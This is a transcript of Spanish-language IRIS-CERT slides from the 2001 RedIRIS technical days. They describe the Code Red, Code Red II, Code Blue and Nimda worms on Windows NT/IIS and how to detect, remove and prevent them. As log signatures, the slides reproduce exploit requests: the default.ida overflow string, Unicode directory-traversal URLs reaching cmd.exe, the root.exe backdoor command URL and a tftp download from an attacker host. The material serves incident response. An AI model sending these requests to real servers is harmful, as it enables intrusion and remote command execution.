Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001
description
Transcript of Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001
Jornadas Técnicas RedIRIS 2001Pamplona, Octubre 2001
IX Grupo de coordinaciónIRIS-CERTÚltimas tendencias: Gusanos en equipos NT
JT2001 – gusanos en equipos NT- 2IRIS-CERT – [email protected]
Agenda
• Terminología• Gusanos
CODE RED (CRv1, CRv2a, CRv2b)http://www.cert.org/advisories/CA-2001-19.htmlhttp://www.cert.org/advisories/CA-2001-23.html
CODE RED IIhttp://www.cert.org/incident_notes/IN-2001-09.htmlhttp://www.incidents.org/react/code_redII.php
CODE BLUEhttp://xforce.iss.net/alerts/advise96.php
W32/NIMDA // “CONCEPT VIRUS (CV) V 5.”http://www.cert.org/advisories/CA-2001-26.htmlhttp://www.incidents.org/react/nimda.pdf
• Medidas preventivas
JT2001 – gusanos en equipos NT- 3IRIS-CERT – [email protected]
Terminología
• Gusano Programa que puede ejecutarse independientemente y que se puede propagar a otras máquinas. “The Shockware Rider” John Brunner 1975 Morris Worm (“The Internet Worm Incident”) 1988
• Virus Secuencia de código que se inserta en otros programas (“hosts”). Necesita la intervención humana para que se ejecute su programa “hosts”.
JT2001 – gusanos en equipos NT- 4IRIS-CERT – [email protected]
CODE RED.Sistemas afectados
• Windows NT con IIS 4.0/5.0 y Index Server 2.0 instalado
• Windows 2000 con IIS 4.0/5.0 y Index Server instaladohttp://www.microsoft.com/technet/security/bulletin
/MS01-044.asphttp://www.microsoft.com/technet/security/bulletin
/MS01-033.asp
• Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (instalan IIS)
• Cisco 600 series DSL routershttp://www.cisco.com/warp/public/707/cisco-code-red-
worm-pub.shtml
JT2001 – gusanos en equipos NT- 5IRIS-CERT – [email protected]
CODE RED.Descripción (CRv1)
• Actividad dependiente de la fecha del sistema: Día 1-19 Actividad de propagación
• Genera direcciones IP aleatorias IIS 4.0/5.0 + IDA infectada Cisco 600 series DSL routers El router deja de
reenviar paquetes No IIS/puerto 80 abierto logea
Se pueden producir re-infecciones Degradación de rendimiento y DoS
• Idioma Inglés (US)? Modificación páginas WWW Día 20-27 DoS contra www.whitehouse.gov Día 28-final mes Duerme infinitamente
JT2001 – gusanos en equipos NT- 6IRIS-CERT – [email protected]
CODE RED.Huellas
• En el sistema/default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a
• En la red Tráfico desde nuestra máquina (infectada) al puerto
80/tcp de máquinas aleatorias
JT2001 – gusanos en equipos NT- 7IRIS-CERT – [email protected]
CODE RED.Variaciones
• CRv2a No modifica páginas Web Selección de víctimas aleatorias
• CRv2b No modifica páginas Web Selección de victimas mejorado Busca www.whitehouse.gov en DNS
JT2001 – gusanos en equipos NT- 8IRIS-CERT – [email protected]
CODE RED.Detección y Eliminación
• Aumento carga del sistema• Aumento conexiones externas al puerto 80/tcp hacia
direcciones aleatorias (netstat –na)• Code Red FAQ
http://incidents.org/react/code_red.php
• Gusano residente en memoria reiniciar la máquina No nos salva de posteriores re-infecciones El atacante sigue teniendo control total de la máquina
• Aplicar parches recomendados
• CodeRedscannerhttp://www.cymru.com/~robt/Tools/coderedscanner-2.5.tar.
gz• Retina CodeRed Scanner
http://www.eeye.com/html/Research/Tools/RetinaCodeRed.exe
JT2001 – gusanos en equipos NT- 9IRIS-CERT – [email protected]
CODE RED II.Sistemas afectados
• Windows 2000 con IIS 4.0/5.0 y Index Server instalado
• Windows NT 4.0 con IIS 4.0/5.0 y Index Server 2.0 instaladohttp://www.microsoft.com/technet/security/bulletin
/MS01-044.asphttp://www.microsoft.com/technet/security/bulletin
/MS01-033.asp
• Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (instalan IIS)
• Cisco 600 series DSL routershttp://www.cisco.com/warp/public/707/cisco-code-red-
worm-pub.shtml
JT2001 – gusanos en equipos NT- 10IRIS-CERT – [email protected]
CODE RED II.Descripción
• Chequea si el sistema ha sido infectado con anterioridad
• Actividad de propagación: La agresividad del escaneo depende del lenguaje del
sistema Escaneo de direcciones IP de la misma subred de clase A
o B (método probabilístico) Efectos colaterales de saturación
• Copia %SYSTEM%CMD.EXE (puerta trasera) c:\inetpub\scripts\root.exe c:\progra~1\common~1\systema\MSADC\root.exe d:\inetpub\scripts\root.exe d:\progra~1\common~1\systema\MSADC\root.exe
• Instala troyano explorer.exe (c:\ y d:\)
http: // IP/c/inetpub/scripts/root.exe/c+ARBITRARY_COMMAND
JT2001 – gusanos en equipos NT- 11IRIS-CERT – [email protected]
CODE RED II.Huellas
• En el sistemaGET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0 0%u531b%u53ff%u0078%u0000%u00=a
• En la red Tráfico desde nuestra máquina (infectada) al puerto
80/tcp de otras máquinas vecinas
JT2001 – gusanos en equipos NT- 12IRIS-CERT – [email protected]
CODE RED II.Detección y eliminación
• Aumento carga del sistema• Aumento conexiones externas al puerto
80/tcp (netstat –na) (IPs vecinas)
• Code Red FAQ http://incidents.org/react/code_red.php
• AntiCodeRed2.vbshttp://www.incidents.org/react/AntiCodeRed2.vbs
• Microsofthttp://www.microsoft.com/technet/itsolutions/security/
tools/redfix.asp
• Formatear disco duro• Reinstalar software (aplicando parches
recomendados)
JT2001 – gusanos en equipos NT- 13IRIS-CERT – [email protected]
CODE BLUE.Sistemas afectados
• Máquinas con IIS 4.0/5.0 instalado
IIS Extended UNICODE Directory Traversal Vulnerability
http://xforce.iss.net/alerts/advise68.php
GET /.. [Encoded characters] ../winnt/system32/cmd.exe?/c+dir
JT2001 – gusanos en equipos NT- 14IRIS-CERT – [email protected]
CODE BLUE.Descripción
• Reside en memoria• Instala un Visual Basic Script (d.vbs) que
elimina el mapeo ISAPI para ficheros “.ida”, “.idq”, “.printer”
• Carga una DDL (httpext.dll) y un .EXE (svchost.exe)
• Propagación escaneo IPs vecinas• 10 am – 11 am GMT Ataque de inundación
contra una IP de China
JT2001 – gusanos en equipos NT- 15IRIS-CERT – [email protected]
CODE BLUE.Eliminación
• Con Regedit encontrar la clave del registroHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run
• Buscar y borrar la entrada del registro para c:\svchost.exe
• Eliminar los archivos c:\svchost.exe y c:\d.vbs• Reiniciar el ordenador • Aplicar parche recomendado
JT2001 – gusanos en equipos NT- 16IRIS-CERT – [email protected]
W32/NIMDA.Sistemas afectados
• Microsoft Windows 95, 98, ME, NT y 2000• Formas de propagarse
De cliente a cliente (vía mail/recursos de red compartidos)
http://www.cert.org/advisories/CA-2001-06.html De servidor Web a cliente (por navegación sobre
páginas modificadas) De cliente a servidor Web
• IIS Extended UNICODE Directory Traversal Vulnerability
http://www.kb.cert.org/vuls/id/111677• Puertas traseras dejadas por Code Red II y sadmin/IIShttp://www.cert.org/incident_notes/IN-2001-09.htmlhttp://www.cert.org/advisories/CA-2001-11.html
JT2001 – gusanos en equipos NT- 17IRIS-CERT – [email protected]
W32/NIMDA.Descripción
• Manda copias de sí mismo a todas las direcciones encontradas en la libreta de direcciones
• Escaneo de IPs aleatorias siguiendo método probabilístico Intenta transferirse a máquinas vulnerables (IIS) vía tftp
(69/udp)• Recorre todos los directorios en el sistema y se copia
como README.EML• Si encuentra archivos .html o .asp incluye código
Javascript que permitirá propagación al navegar por esas páginas
• Crea una cuenta “Guest” (NT y 2000) perteneciente al grupo “Administrator”
• Activa la compartición de la unidad c:\ (C$)• Crea troyanos de aplicaciones legítimas previamente
instaladas en el sistema
JT2001 – gusanos en equipos NT- 18IRIS-CERT – [email protected]
W32/NIMDA.Huellas
GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
JT2001 – gusanos en equipos NT- 19IRIS-CERT – [email protected]
W32/NIMDA.Detección y eliminación
• Buscar root.exe Admin.dll Ficheros .eml y .nws extraños Log:
/c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200
x.x.x.x máquina atacante200 comando realizado con éxito
• Formatear disco duro• Reinstalar software (aplicando parches
recomendados)
JT2001 – gusanos en equipos NT- 20IRIS-CERT – [email protected]
Medidas preventivas
• Instalar sólo los servicios estrictamente necesarios• Permitir acceso sólo a los servidores públicos• Mantener las máquinas actualizadas con los últimos parches
de seguridad Hotfix (Microsoft)http://support.microsoft.com/support/kb/articles/q303/2/15.asp?
id=303215&sd=tech
• Desactivar extensiones dañinas en IIS Lockdown (Microsoft)http://www.microsoft.com/technet/security/tools/locktool.asp
• Bloquear el tráfico HTTP en función de la URL que se solicita (Cisco nbar+acl)http://www.cisco.com/warp/public/63/nimda.shtmlhttp://www.cisco.com/warp/public/63/nbar_acl_codered.shtml
• Cambiar el directorio base de la instalación de Windows NT• Chequear/controlar los logs de los servidores Web• Contestar/actuar rápidamente ante denuncias.
JT2001 – gusanos en equipos NT- 21IRIS-CERT – [email protected]